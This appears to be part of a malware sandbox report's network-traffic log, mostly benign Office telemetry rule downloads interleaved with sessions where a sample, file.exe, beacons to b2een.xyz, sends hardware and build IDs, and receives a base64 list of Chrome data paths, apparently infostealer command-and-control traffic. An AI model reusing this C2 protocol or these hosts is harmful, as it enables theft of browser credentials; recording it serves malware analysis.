2024-11-25 10:33:24 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49727	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:24 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:24 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 30a29eaf-701e-001e-220f-3ef5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103324Z-178bfbc474bfw4gbhC1NYCunf400000007dg000000001yz2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:24 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49728	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:24 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:24 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 38 45 46 44 35 46 45 41 43 34 32 35 33 38 31 37 36 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="hwid"778EFD5FEAC4253817676-a33c7340-61ca------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------KKJEBAAECBGDHIECAKJK--
2024-11-25 10:33:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:25 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|6d45671cc31af7a6940de95c23332da3\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49730	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:25 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:26 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 21648528-e01e-003c-794e-3cc70b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103326Z-178bfbc474bxkclvhC1NYC69g400000007800000000082nf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:26 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49729	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:25 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:26 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 000c37a0-d01e-002b-0920-3d25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103326Z-178bfbc474bq2pr7hC1NYCkfgg00000007bg00000000b0fe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:26 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49731	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:25 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:26 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 44207c53-001e-0079-37ad-3b12e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103326Z-15b8b599d88vp97chC1TEB5pzw00000005pg00000000ggkq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:26 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49732	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:26 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:26 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 3257ccc0-201e-005d-19b5-3eafb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103326Z-178bfbc474brk967hC1NYCfu600000000770000000001xp4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:26 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49733	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:26 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:26 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103326Z-174c587ffdfb74xqhC1TEBhabc00000005s000000000ebdn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:26 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49734	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:27 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------AFCAAEGDBKJJKECBKFHCCont
2024-11-25 10:33:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:27 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	49737	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:28 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:28 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: b12c7864-501e-007b-43bf-3e5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103328Z-178bfbc474bw8bwphC1NYC38b4000000073000000000a6qm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:28 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	49736	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:28 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 40d9340c-a01e-0050-06b8-3edb6e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103328Z-178bfbc474bnwsh4hC1NYC2ubs00000007f0000000002r14 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	49735	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:28 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: c77577e7-501e-0078-0da6-3e06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103328Z-178bfbc474bp8mkvhC1NYCzqnn000000075g000000006bwb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
